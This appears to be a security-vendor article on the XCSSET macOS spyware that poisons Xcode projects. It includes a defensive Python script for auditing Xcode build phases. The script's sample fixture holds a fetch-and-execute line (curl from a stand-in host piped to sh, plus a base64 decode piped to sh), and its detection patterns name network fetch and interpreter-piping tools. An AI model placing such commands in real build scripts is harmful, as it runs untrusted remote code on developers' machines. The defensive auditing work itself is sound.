
XCSSET Malware

Posted: August 17, 2020

The XCSSET Malware is spyware that compromises macOS projects during the Xcode compilation process. All users of the resulting compiled programs are at risk of losing confidential Web-browsing data and may experience browser redirects, financial transaction hijackings and other attacks. Compatible anti-malware products should detect and remove the XCSSET Malware, and developers should maintain strict version control of their projects and issue rollbacks and patches as necessary.

Spyware Gets Serious about Apple Products

While Windows bears the brunt of most Trojan campaigns, threat actors aren't forgetting about other operating systems, and particularly macOS. The earlier XcodeGhost campaign's innovation of hijacking Xcode compilation is returning in another form: the XCSSET Malware. Although the overall method of infection is shockingly similar, the XCSSET Malware has a more focused payload and prefers collecting data – or locking it.

In both campaigns, the accidental distributor is an independent developer who unwittingly uses a corrupted compiler (in XcodeGhost's case) or, possibly, previously compromised code during the compilation process. The resulting program bundles additional threats inside itself, like the XCSSET Malware. So far, malware researchers have yet to see XCSSET Malware attacks outside of Asia, with China and India appearing most at risk. Significantly, the XCSSET Malware is infecting several GitHub projects – meaning that any devs who use the accidentally poisoned repositories in their pet projects also will distribute the spyware.

The XCSSET Malware uses software security oversights, such as a Data Vault bypass and a workaround for Safari password requests, to accomplish its primary function of exfiltrating the victim's personal information. Besides collecting login credentials and other data, the XCSSET Malware may force the user's browser into loading unsafe website content (such as a fake bank login page), hijack social media accounts, and dynamically redirect cryptocurrency payments to other wallets.

Malware researchers further emphasize that the XCSSET Malware has a broader scope than just the browser and can snap screenshots, scrape info out of programs like Skype or Evernote, and use a dedicated, file-locking module for holding the user's media files hostage (a la Hidden Tear, the Dharma Ransomware, and the like).

Growing an Apple that's Immune to Poisonous Software Bugs

The role of developer curation in curbing the XCSSET Malware's campaign is crucial. Developers should always examine free code resources for potential bugs or other security oversights, including telltale signs of embedded Trojans. As with XcodeGhost, macOS users should continue using Gatekeeper and other compatible security products for their protection, while also vetting their downloads for symptoms of danger, such as poor reviews.
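One practical way for a developer to act on this advice against the specific vector described above (a project that is compromised at Xcode build time) is to audit the project's own build configuration before compiling it. The script below is an added example written for this page, not code from the page's author or from any XCSSET analysis; it assumes the standard Xcode `project.pbxproj` layout, and its indicator patterns (remote fetch, base64 decoding, piping text into an interpreter, hidden home-directory paths) are a generic heuristic, not published XCSSET indicators. The embedded project fragment is constructed for the demonstration.

```python
"""Audit an Xcode project.pbxproj for risky 'Run Script' build phases.

Added example (assumption-based heuristic): flags shell build phases that
fetch remote content, decode embedded payloads, or pipe text into an
interpreter. The indicator list is a generic assumption, not a signature.
"""
import re
import sys

# One PBXShellScriptBuildPhase object: "<id> /* comment */ = { ... };"
# Assumption: standard pbxproj layout; this object type has no nested braces.
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]{8,24})\s*/\*\s*(?P<comment>[^*]*?)\s*\*/\s*=\s*\{'
    r'(?P<body>[^}]*?isa\s*=\s*PBXShellScriptBuildPhase;[^}]*)\}',
    re.DOTALL,
)
# The script body is a double-quoted string with backslash escapes.
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"(?P<script>(?:[^"\\]|\\.)*)"\s*;', re.DOTALL)

# Heuristic indicators chosen for this example (assumptions, not XCSSET IoCs).
INDICATORS = {
    "base64 decode": re.compile(r'\bbase64\b[^\n|]*(?:-d|-D|--decode)\b'),
    "network fetch": re.compile(r'\b(?:curl|wget)\b'),
    "pipe to interpreter": re.compile(r'\|\s*(?:sh|bash|zsh|python3?|perl|osascript)\b'),
    "AppleScript execution": re.compile(r'\bosascript\b'),
    "eval of dynamic string": re.compile(r'\beval\b'),
    "write under hidden home path": re.compile(r'(?:~|\$HOME)/\.[\w-]+'),
}

# Constructed sample fragment, not taken from any real project.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "swiftlint lint --quiet\n";
        };
        E5F6A7B8 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo \"ZWNobyBoaQ==\" | base64 -d | sh\ncurl -fsSL http://example.invalid/x | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''


def unescape_pbx(s):
    """Undo pbxproj string escaping: \\n, \\t, \\" and \\\\ become their literal values."""
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s, flags=re.DOTALL)


def extract_run_scripts(pbxproj):
    """Return every shell build phase as a dict with 'id', 'name' and decoded 'script'."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj):
        s = SCRIPT_RE.search(m.group("body"))
        if s:
            phases.append({"id": m.group("id"), "name": m.group("comment"),
                           "script": unescape_pbx(s.group("script"))})
    return phases


def audit_run_scripts(pbxproj):
    """Return only the phases whose script matches at least one indicator, with the hits listed."""
    findings = []
    for phase in extract_run_scripts(pbxproj):
        hits = [name for name, rx in INDICATORS.items() if rx.search(phase["script"])]
        if hits:
            findings.append({**phase, "indicators": hits})
    return findings


def main(argv):
    # With a path argument, audit that project.pbxproj; otherwise use the constructed sample.
    text = open(argv[1], encoding="utf-8").read() if len(argv) > 1 else SAMPLE_PBXPROJ
    findings = audit_run_scripts(text)
    for f in findings:
        print(f"[!] phase {f['id']} ({f['name']}): {', '.join(f['indicators'])}")
        for line in f["script"].splitlines():
            print("    | " + line)
    if not findings:
        print("no risky shell build phases found")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a project with `python3 audit_pbxproj.py MyApp.xcodeproj/project.pbxproj`; a non-zero exit makes it usable as a pre-build or pre-commit gate. Every flagged phase still needs a human read, since legitimate tooling also uses `curl` or `base64`, but a Run Script phase that appeared after pulling a third-party repository is exactly the kind of change strict version control is meant to surface.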

During XCSSET Malware infections, users should avoid Internet contact to limit the theft of passwords and related hijackings of accounts, credit cards, etc. Cryptocurrency (Bitcoin, Monero, et al.) users also should double-check any transactions for wallet address changes before finalizing their payments. Avoiding the reuse of the same passwords across multiple accounts, abiding by best practices like installing software updates quickly, and following other security guidelines will mitigate the risk of lingering damage from XCSSET Malware attacks.

Of course, users should have compatible anti-malware tools for their system or device to remove the XCSSET Malware immediately. They also may require external backups for content restoration in case the XCSSET Malware's file-locking module triggers.

With money on its mind in any way that it can get it, the XCSSET Malware is an incredible threat to Apple's operating system and its users. Owning a minority brand of hardware doesn't harden anyone against all Trojan attacks, particularly when, as in this case, it's a metaphorical phone call coming from inside the building.
